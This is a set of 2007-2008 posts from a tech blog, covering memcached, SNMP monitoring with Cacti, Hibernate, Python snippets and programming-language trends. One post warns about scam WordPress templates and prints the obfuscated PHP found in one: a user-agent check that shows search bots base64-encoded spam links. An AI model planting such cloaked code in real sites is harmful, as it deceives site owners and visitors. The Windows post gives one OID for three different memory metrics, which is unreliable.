Netuality

Google: sorry, but Lisp/Ruby/Erlang not on the menu

2008-05-28T21:35:00Z

Yes, language propaganda again. Ain’t it fun ?

Here comes a nice quote from the latest Steve Yegge post (read it entirely if you have the time, it’s both fun and educational - at least for me). So, there:

I made the famously, horribly, career-shatteringly bad mistake of trying to use Ruby at Google, for this project. And I became, very quickly, I mean almost overnight, the Most Hated Person At Google. And, uh, and I’d have arguments with people about it, and they’d be like Nooooooo, WHAT IF… And ultimately, you know, ultimately they actually convinced me that they were right, in the sense that there actually were a few things. There were some taxes that I was imposing on the systems people, where they were gonna have to have some maintenance issues that they wouldn’t have. [...] But, you know, Google’s all about getting stuff done.

[...]

Is it allowed at Google to use Lisp and other languages?

No. No, it’s not OK. At Google you can use C++, Java, Python, JavaScript… I actually found a legal loophole and used server-side JavaScript for a project.

Mmmmm … key ?

Java going down, Python way up, and more …

2008-05-28T20:40:09Z

According to O’Reilly Radar, sales of Java books have declined in the last 4 years by almost 50%. C# is selling more books from year to year and will probably level up with Java in 2008. Javascript is on the rise (due to AJAX, for sure) and PHP is on a surprising decrease path (although the job statistics indicate quite the contrary).

In 2007, the number of sold Ruby books was larger than the number of Python books. In their article they qualify Ruby as being a “mid-major programming language” and Python as “mid-minor programming language”. However, after the announcement of Google App Engine the number of Python downloads from ActiveState has tripled in May. This should become visible in the book sales statistics, pretty soon.

memcached vs tugela vs memcachedb

2008-03-16T21:40:24Z

This presentation was planned for an older Wurbe event, but as this never quite happened in the last 4 months I am publishing it now, before it becomes totally obsolete.

My original contribution here is a comparison between the original memcached server from Danga and the tugela fork from the MediaWiki programmers. I’ve also tried memcachedb but the pre 1.0 version (from Google Code) in November 2007 was quite unstable and unpredictible.

In a nutshell, these memcache versions are using BerkeleyDB instead of memory slab allocator. There are 2 direct consequences:

when the memory is large enough for the whole cache, database-backed servers will be slower (my tests shown 10-15% which might be tolerable - or not - for your app)
when you’ve got lots of data to cache and your server’s memory is low, relying on bdb is significantly better than letting the swap mechanism to do its job (from my benchmarks, the difference can go up to 10 times faster especially under very high concurrency conditions)

Tugela will prove especially useful when running it on virtualized servers with very low memory.

My tests were performed with the “Tummy” Python client and Stackless for the multithreaded version. In one of the following weeks I’ll update the benchmarks for memcachedb 1.0.x - and I promise never ever to wait 4 months for a presentation, again …

Looking for #3 at Roblogfest Business/Technology ?

2008-03-15T07:28:26Z

If you came here from the Mediafax article, this address is wrong. The Netuality you’re looking for is hosted by Hotnews.

My presentation at Wurbe#5

2008-01-22T11:08:54Z

Wurbe is the informal web developers meeting group, from Bucharest Romania. Meeting #5 was focused on automated testing (unit, TDD, BDD, other stuff). This is my presentation:

Nasty Wordpress template scam

2007-10-21T14:24:41Z

Moving my blog to the Wordpress platform, I wanted to install a template somewhat nicer than the default. This is how I discovered a potentially very harmful stunt which some blackhats are pulling in free Wordpress templates. What they do is build sort of “template farms” where they keep a directory of hundreds or maybe thousands of templates. As these sites are very well optimized for search engines, they rank pretty high when the unsuspecting victim is looking for some free templates. Sometimes, the victim just downloads a nice-looking template from a seemingly inocuous blog hosted on a free platform (wordpress.com,blogger,etc.).

Do not install a Wordpress template without performing at least a cursory security audit. Let me remind you that the view layer in Wordpress is just another PHP script with full power to do anything a PHP script can do on your server. This is what the template I’ve downloaded contained embedded in multiple source files (sidebar, archive, etc.):

if(strstr($_SERVER['HTTP_USER_AGENT'],base64_decode(’Ym90′))){echo base64_decode(
‘PGEgaHJlZj1cImh0dHA6Ly93d3cuYmVzdGZyZWVzY3JlZW5zYXZlci5jb21cIiBjbGFzcz1cInNw
YWNpbmctZml4XCI+RnJlZSBDZWxlYnJpdHkgU2NyZWVuc2F2ZXJzPC9hPjxhIGhyZWY9XCJodHRw
Oi8vd3d3LnNrb29ieS5jb21cIiBjbGFzcz1cInNwYWNpbmctZml4XCI+RnJlZSBPbmxpbmUgR2Ft
ZXM8L2E+’);}

Basically, this means that any UserAgent containing the word “bot” (thus, all the mainstream search engine bots/site crawlers) will see a couple of spammy links on all the pages of the blog. Obviously it could have been much worse, as one can reveal the database access coordinates and other server-related dangerous things when a blackhat bot identified by a specially crafted UserAgent text is scanning the blog. The simplest form of audit one can do is to search for base64 and eval functions in the PHP source code as these are generally used to disguise malware.

New home for my blog

2008-03-12T21:41:12Z

I decided to start again to do some blogging, after a one year hiatus. My new blog will be hosted here, at Netuality. Sorry for losing all the comments, but Wordpress does not know how to export data from Apache Roller, had to do it via RSS. Oh and yes, the weird code formatting and too big images, these will be fixed when I have some spare time …

Java Persistence with Hibernate - the book, my review

2008-01-25T11:45:18Z

You have to know that I’ve tried. Honestly, I did. I hoped to be able to read each and every page of “Java persistence with Hibernate” (revised edition of “Hibernate in action”), by Christian Bauer and Gavin King. But, I gave up before reading a third of it, then I continued only reading some sections. First, because I know Hibernate, I’ve used Hibernate in all the Java projects I’ve been involved with - in the last 5 years or so. Second, because the content from the first edition is more than familiar to me. And third, because this second edition is a massive > 800 pages book (double the number of pages in the first edition). At that rate, the fourth edition will be sold together with some sort of transportation device, because a mere human will not be able to carry that amount of paper. How did this happened ?

Hibernate is the perfect example of a successful Java open-source project. Initially started as a free alternative to commercial object-relational mapping tools, it quickly became mainstream. Lots of Java developers around the world use Hibernate for the data layer inside their projects. It’s very comfortable, just set some attributes or ask for a business object instance and Hibernate does all the ugly SQL for you. As a developer, you are then comfortably protected from that nasty relational database, and gently swim in a sea of nicely bound objects. Right ? No, not exactly. Each object-relationship mapping tool has its own ways of being handled efficiently, and this is where books like “Java persistence with Hibernate” come into play. This book teaches you how to work with Hibernate, with a “real-world” example: the Caveat-Emptor online auction application.

Since the first edition of the book was written, lots of things happened in the Hibernate world and you can see their impact in “Java persistence with Hibernate”. Most important is the release of the 3.x version line and its different ameliorations and new features: code annotations used as mapping descriptors, package naming reorganization inside the API, but most important the standardization under the umbrella of JPA (Java Persistence API) for a smooth integration with EJB 3 inside Java EE 5 servers. And this, is a little bit funny. Yesterday, Hibernate was the main proof that it is possible to make industrial-quality projects within a “J2EE-less” environment, today Hibernate has put a suit and a tie, joined the ranks of Jboss, then Redhat, and it lures the unsuspecting Java developers towards the wonderful and (sometimes) expensive world of Java EE 5 application servers. Which is not necessarily a bad move for the Hibernate API, but it’s a proof that in order to thrive as an open-source project, you need so much more than the Sourceforge account and some passion …

Enough with that, let’s take a look at the book content. Some 75% if it is in fact the content of the first edition, updated and completed. You learn what object-relational mapping is, the advantages, the quirks, the recommended way of developing with Hibernate. For a better understanding, single chapters from the initial book were expanded into 2, sometimes more, chapters. The “unit of work” is now called “a conversation” and you’ve got a whole new chapter (11) about conversations, which is in fact pretty good stuff about session and transaction management. Christian and Gavin done some great writing about concurrency and isolation in the relatively small 10-th chapter - which is a must read even if you’re not interested in Hibernate, but you want to understand once and for all what are these concurrent transaction behaviors everyone is talking about. The entire 13th chapter is dedicated to fetching strategy and caching, which is a must read if you want performance and optimization from your application. There is also a good deal of EJB, JPA and EE 5 - related stuff scattered in multiple chapters. And finally, a solid 50-pages chapter is pimping the JSF (Java Server Faces) compliant web development framework, Jboss Seam. I have only managed to read a few pages of this final chapter, so cannot really comment. Note to self: play a little bit with that Seam thing.

To conclude, is this a fun book ? No. Is this a perfect book to convert young open-source fanatics to the wonders of Hibernate API ? Nope. Is this a book to read cover to cover during a weekend ? Not even close. Then, what is this ? First, it’s the best book out there about Hibernate (and there are quite a few on the market right now), maybe even the best book about ORM in Java, in general. It has lots of references to EJB, JPA and EE, it will help you to easily sell a Hibernate project to the management. Even if the final implementation uses Spring … And finally, it’s the best Hibernate reference money can buy. When you have an issue, open the darn index and search, there are 90% chances your problem will be solved. And that’s a nice accomplishment. Don’t get this book because it’s funny, because it’s a nice read, about a new innovative open-source project. Buy it because it helps you grok ORM, write better code, deliver quality projects.

Programming is hard - the website

2008-03-12T20:49:10Z

A newcomer in the world of “code snippets” sites in programmingishard.com. Although the site is a few months old, only recently it started to gain some steam. Unlike its competition Krugle and Koders, this is not a code search engine but a snippet repository entirely tag-based, user-built. The author has a blog at tentimesbetter.com.

As for watering your mouth, this is a Python code fragment that I found on the site, for the classic inline conditional which does not exist “such as” in Python:

n = ['no', 'yes'][thing == 1]

Obviously it has the big disadvantage of having to compute both values no matter what the condition thing is, but is very short and elegant. Simple but nice code sugar.

Monitoring memcached with cacti

2008-09-26T08:43:48Z

Memcached is a clusterable cache server from Danga. Or, as they call, it a distributed memory object caching system. Well, whatever. Just note that memcached clients exist for lots of languages (Java, PHP, Python, Ruby, Perl) - mainstream languages in the web world. A lighter version of server was rewritten in Java by Mr. Jehiah Czebotar. Major websites such as facebook, slashdot, livejournal and dealnews use memcached in order to scale for the huge load they’re serving. Recently, we needed to monitor the memcache servers on a high-performance web cluster. By googling and reading the related newsgroups, I was able to find two solutions.

from faemalia.net, a script which is integrated with the MySQL server templates for Cacti. Uses the Perl client.
from dealnews.com, a dedicated memcached template for Cacti and some scripts based on the Python client. The installation is thoroughly described.

These two solutions have the same approach - provide a Cacti template. The charts drawn by these templates are based on data extracted by the execution of memcached client scripts. Maybe very elegant, but could become a pain in the dorsal area. Futzing with Cacti templates was never my favorite pasttime. Just try to import a template exported from a different version of Cacti and you’ll know what I mean. In my opinion, there is a simple way, which consists in installing a memcached client on all the memcached servers, then extracting the statistical values using a script. We’ll use the technique described in one of my previous posts, to expose script results as SNMP OID values. Then, track these values in Cacti via the generic existing mechanism. My approach has the disadvantage of installing a memcached client on all the servers. However, it is very simple to build your own charts and data source templates, as for any generic SNMP data. All you need now a simple script which will print the memcached statistics, one per line. I will provide one-liners for Python, which will obviously work only on machines having Python and the “tummy” client installed. This is the recipe (default location of Python executable on Debian is /usr/bin/python but YMMV):

1. first use this one liner as snmpd exec :

/usr/bin/python -c “import memcache; print (’%s’%[memcache.Client(['127.0.0.1:11211'], debug=0).get_stats()[0][1],]).replace(\”‘\”,”).replace(’,',’\n’).replace(’[','')
.replace(']‘,”).replace(’{',”).replace(’}',”)”

This will display the name of the memcached statistic along with its value and will allow you to hand pick the OIDs that you want to track. Yes, I know it could be done simpler with translate instead of multiple replace. Will be left as an exercise for the Python-aware reader.

2. after having a complete list of OIDs use this one-liner:

/usr/bin/python -c “import memcache; print ‘##’.join(memcache.Client(['127.0.0.1:11211'], debug=0).get_stats()[0][1].values()).replace(’##’,'\n’)”

The memcached statistics will be displayed in the same order, but only their values not their names.

This is the mandatory eye candy:

Scale well your applications, until next time.

Monitoring Windows servers - with SNMP

2008-08-22T08:26:29Z

My previous article was focused on Linux monitoring. Often, you’ll have in your datacenter at least a few Windows machines. SQL Server is one of the best excuses these days to get a Microsoft machine in your server room - and you know what, it’s a decent database - well, at least for medium-sized companies like the one I’m working for right now.

It is less known, but yes you can have SNMP support out of the box with Windows 2000 and XP, and it doesn’t need to be the Server flavor [obiously it works the same in 2003 Server]:

Invoke the Control Panel.
Double click the Add/Remove Programs icon.
Select Add/Remove Windows Components. The Windows Component Wizard is displayed.
Check the Management and Monitoring Tools box.
Click the Details button.
Check the Simple Network Management Protocol box and click OK, then Next. You may have to reboot the machine.

After the server is installed, the SNMP service has to be configured. This is how:

Invoke the Control Panel.
Double click the Administrative Tools icon.
Double click the Services icon.
Select SNMP Service.
Choose the Security tab.
Add whatever community name is used in your network. Chances are in a local internal LAN the default public works out of the box.
For a sensitive server, you may want to fiddle a little bit with the IP restriction settings, for instance allowing SNMP communication only with the monitoring machine.
Click OK then restart the service.

Next step is Cacti integration. Unfortunately, there is no Windows-specific profile for devices in Cacti. Therefore if you have lots of Windows machines, you’ll have to define your own. Or, take a Generic SNMP-enabled host and use it as a scaffold for each device configuration.

Out of the graphs and datasources already defined in Cacti [I am using 0.8.6c] only two work with Windows SNMP agents: processes and interface traffic values.

It’s a good start, but if you are serious about monitoring, you need to dig a little bit deeper. Once again, the MIB Browser comes to save the day. It’s very simple, just search on the Windows machine for any .mib files you are able to find, copy on your workstation, load them into the MIB browser and make some recursive walks (Get subtree on the root of the MIB).This way, I was able to find some interesting OID for the Windows machine. For instance, .1.3.6.1.2.1.25.3.3.1.2.1 -> .1.3.6.1.2.1.25.3.3.1.2.4 the OID for CPU load on each of the 4 virtual CPUs [it's a dual Xeon with HT].

Memory-related OIDs for my configuration are :

.1.3.6.1.2.1.25.2.3.1.5.6 - Total physical memory
.1.3.6.1.2.1.25.2.3.1.6.6 - Used physical memory
.1.3.6.1.2.1.25.2.3.1.6.6 - Total virtual memory ["virtual"="swap" in Windows lingo]
.1.3.6.1.2.1.25.2.3.1.6.6 - Used virtual memory

Here’s a neat memory chart for a windows machine. Notice that the values are in “blocks” which in my case is 64kb. The total physical memory is 4GB.

Most hardware manufacturers do offer SNMP agents for their hardware, as well as the corresponding .mib file . In my case, I was able to install an agent to monitor an LSI Megaraid controller. Here is a chart for the number of disk operations/second: In one of my next articles, we’ll take a look together at the way you can export “non-standard” data over SNMP from Windows, in the same manner we did on Linux, using custom scripts. Till then, have an excellent week.

Unicode in Python micro-recipe : from MySQL to webpage via Cheetah

2008-03-12T21:40:30Z

Very easy:

start by adding the default-character-set=utf8 in your MySQL configuration file and restart the database server
apply this recipe from Activestate Python Cookbook (”guaranteed conversion to unicode or byte string”)
inside the Cheetah template, use the ReplaceNone filter:

#filter ReplaceNone ${myUnicodeString} #end filter

in order to prevent escaping non-ASCII characters.

Now. That’s better.